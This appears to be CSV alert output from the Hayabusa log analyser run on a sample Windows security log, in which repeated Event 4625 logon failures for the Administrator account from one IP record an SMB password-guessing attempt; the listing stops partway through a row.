2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.236 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.712 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: 